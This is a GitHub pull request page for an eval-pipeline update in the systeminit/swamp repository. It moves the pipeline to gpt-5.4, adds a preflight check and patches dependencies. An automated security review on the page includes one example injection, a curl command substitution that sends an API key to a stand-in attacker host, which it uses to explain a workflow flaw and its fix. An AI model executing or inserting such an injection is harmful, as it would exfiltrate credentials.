feat: replace gpt-4.1 with gpt-5.4 evals, add preflight checks by stack72 · Pull Request #1158 · systeminit/swamp

stack72 · 2026-04-10T10:37:14Z

Summary

Replace gpt-4.1 with gpt-5.4 in multi-model skill trigger eval pipeline (openai:gpt-5.4)
Add preflight API check that makes a single API call before launching 202 eval requests — catches billing/credit issues immediately instead of retrying for hours
Fix Gemini eval assertions to handle Google's functionCall response format (was causing 36% pass rate → 93% after fix)
Fix critical security vulnerabilities (axios SSRF, basic-ftp command injection) in promptfoo dependencies via overrides
Gitignore generated promptfooconfig.yaml — it's regenerated every eval run
Add --allow-net to deno task for preflight fetch call

Local test results:

Model	Pass rate	Cost
gpt-5.4	97.5% (197/202)	$0.83
gemini-2.5-pro	93.1% (188/202)	$0.56

Test plan

Verified preflight check catches missing/invalid API keys immediately
Verified gpt-5.4 evals pass locally at 97.5% (above 90% threshold)
Verified gemini-2.5-pro evals pass locally at 93.1% (above 90% threshold)
Verified npm audit shows 0 vulnerabilities after overrides
CI run on this branch should pass

🤖 Generated with Claude Code

Drop concurrency to 1 and add 5s delay between requests for the gpt-5.4 provider to stay within OpenAI rate limits. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

The provider was set to openai:gpt-5 which doesn't exist, causing 429s. Restore concurrency to 5 with a small delay since the account has 5,000 RPM. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

Concurrency 5 still hits 429s despite 5,000 RPM limit — promptfoo's burst pattern overwhelms the rate limiter. Serial execution with 500ms delay should be reliable. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

- Add preflight check that makes a single API call before launching 202 eval requests, catching billing/credit issues immediately instead of retrying for hours - Add --allow-net to deno task for the preflight fetch call - Override axios (>=1.15.0) and basic-ftp (>=5.2.1) to fix critical SSRF and command injection vulnerabilities in promptfoo dependencies Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

github-actions

CI Security Review

Critical / High

None.

Medium

.github/workflows/multi-model-eval.yml:36 — Expression injection in workflow_dispatch input (pre-existing, not introduced by this PR)
- MODELS="${{ github.event.inputs.models || 'all' }}" interpolates the models input directly into a run: block. A repo collaborator could supply a value like $(curl attacker.com/?k=$ANTHROPIC_API_KEY) via the workflow dispatch UI, and the shell would execute the command substitution.
- Mitigating factor: workflow_dispatch can only be triggered by users with write access to the repository, who already have access to repo secrets. Practical exploitability is low.
- Fix: Pass the input via an environment variable instead:
```
env:
  MODELS_INPUT: ${{ github.event.inputs.models || 'all' }}
run: |
  if [ "$MODELS_INPUT" = "all" ] || echo ",$MODELS_INPUT," | grep -q ",${{ matrix.model }},"; then
```
  (Note: matrix.model is safe since it comes from the hardcoded matrix definition.)
.github/workflows/multi-model-eval.yml:49 — denoland/setup-deno@v2 not pinned to SHA (pre-existing)
- Per supply chain best practices, third-party actions should be pinned to a full commit SHA. A tag can be moved to point to different code.
- Mitigating factor: denoland is the official Deno publisher and is generally trusted. The job only has contents: read permissions, limiting blast radius.

Low

None.

Verdict

PASS — The actual changes in this PR are security-neutral: updating a model name (gpt-4.1 → gpt-5.4), reducing concurrency, adding a preflight API check, adding functionCall response format handling in eval assertions, and gitignoring a generated config file. No new security issues are introduced. The two medium findings are pre-existing.

github-actions

Code Review

Blocking Issues

None.

Suggestions

Stale doc comment in generate_config.ts:28 — The usage comment still references gpt-4.1:
```
* Supported model aliases: sonnet, opus, gpt-4.1, gemini-2.5-pro
```
Should be updated to gpt-5.4.
Unscoped --allow-net in deno.json — The other tasks scope their network permissions (e.g., --allow-net=api.osv.dev). Since only the preflight fetch() call needs Deno network access (subprocesses like npm/npx bypass Deno permissions), this could be scoped to --allow-net=api.anthropic.com,api.openai.com,generativelanguage.googleapis.com for defense-in-depth. Low priority since this is a dev/CI-only task.
buildPreflightRequest is unit-testable — It's a pure function mapping model names to request configs. There's no existing test convention in scripts/, so this is just a nice-to-have observation for future hardening.

Overall

Clean PR. The preflight check with AbortSignal.timeout(15_000) is good practice and follows the project's "no fire-and-forget promises" convention. The Gemini functionCall?.name fix correctly handles Google's tool-call response format. Security dependency overrides for axios SSRF and basic-ftp command injection are appropriate. Removing the generated 3K-line YAML from version control and gitignoring it is good hygiene.

Bump promptfoo from 0.121.3 → 0.121.4 and regenerate the lockfile. The new release naturally pulls patched versions of every transitive dep that was previously pinned via an override, so the entire `overrides` block can go. Clears 4 open Dependabot alerts against `evals/promptfoo/package-lock.json`: | # | Package | GHSA | Severity | |---|---|---|---| | 11 | mathjs | GHSA-jvff-x2qm-6286 | high | | 10 | basic-ftp | GHSA-6v7q-wjvx-w8wg | high | | 9 | axios | GHSA-3p68-rc4w-qgx5 | critical | | 8 | basic-ftp | GHSA-chqc-8p9q-pq6q | high | Root cause: #1158 added `axios` and `basic-ftp` overrides but the lockfile was never regenerated, so the committed lockfile still had `axios@1.14.0` and `basic-ftp@5.2.0`. The `basic-ftp: >=5.2.1` range also still allowed the vulnerable 5.2.1 per alert #10, and there was no override at all for mathjs. Resolved versions in the regenerated lockfile: | Package | Was | Now | |---|---|---| | @anthropic-ai/sdk | 0.81.0 | 0.82.0 | | axios | 1.14.0 | 1.15.0 | | basic-ftp | 5.2.0 | 5.2.2 | | mathjs | 15.1.1 | 15.2.0 | | hono | 4.12.12 | 4.12.12 | | @hono/node-server | 1.19.13 | 1.19.13 | No nested/duplicate copies of axios, basic-ftp, or mathjs remain in the lockfile. Verification: - `npm audit` → 0 vulnerabilities - `deno run scripts/audit_deps.ts` → "No known vulnerabilities found" (scanned 1064 packages across deno.lock + promptfoo lockfile) - `deno fmt --check`, `deno lint`, `deno check` — clean No code changes required. The eval entry script calls `npx promptfoo eval` — a stable CLI surface — and a patch bump (0.121.3 → 0.121.4) is not expected to change it. Engine requirement unchanged (`^20.20.0 || >=22.22.0`); CI uses Node 24. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

stack72 and others added 5 commits April 9, 2026 18:22

chore: Add ability to trigger evals for got-5.4

1514e25

fix: add rate limiting for gpt-5.4 evals to avoid 429s

84931e8

Drop concurrency to 1 and add 5s delay between requests for the gpt-5.4 provider to stay within OpenAI rate limits. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

fix: correct gpt-5.4 provider string to openai:gpt-5.4

333a411

The provider was set to openai:gpt-5 which doesn't exist, causing 429s. Restore concurrency to 5 with a small delay since the account has 5,000 RPM. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

github-actions bot approved these changes Apr 10, 2026

View reviewed changes

stack72 merged commit 9531f6f into main Apr 10, 2026
11 checks passed

stack72 deleted the workflow-gpt-5.4 branch April 10, 2026 10:42

stack72 mentioned this pull request Apr 11, 2026

fix(evals/promptfoo): upgrade promptfoo to 0.121.4 and drop overrides #1163

Merged

10 tasks

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

feat: replace gpt-4.1 with gpt-5.4 evals, add preflight checks#1158

feat: replace gpt-4.1 with gpt-5.4 evals, add preflight checks#1158
stack72 merged 5 commits intomainfrom
workflow-gpt-5.4

stack72 commented Apr 10, 2026

Uh oh!

github-actions bot left a comment

Uh oh!

github-actions bot left a comment

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Conversation

stack72 commented Apr 10, 2026

Summary

Test plan

Uh oh!

github-actions bot left a comment

Choose a reason for hiding this comment

CI Security Review

Critical / High

Medium

Low

Verdict

Uh oh!

github-actions bot left a comment

Choose a reason for hiding this comment

Code Review

Blocking Issues

Suggestions

Overall

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant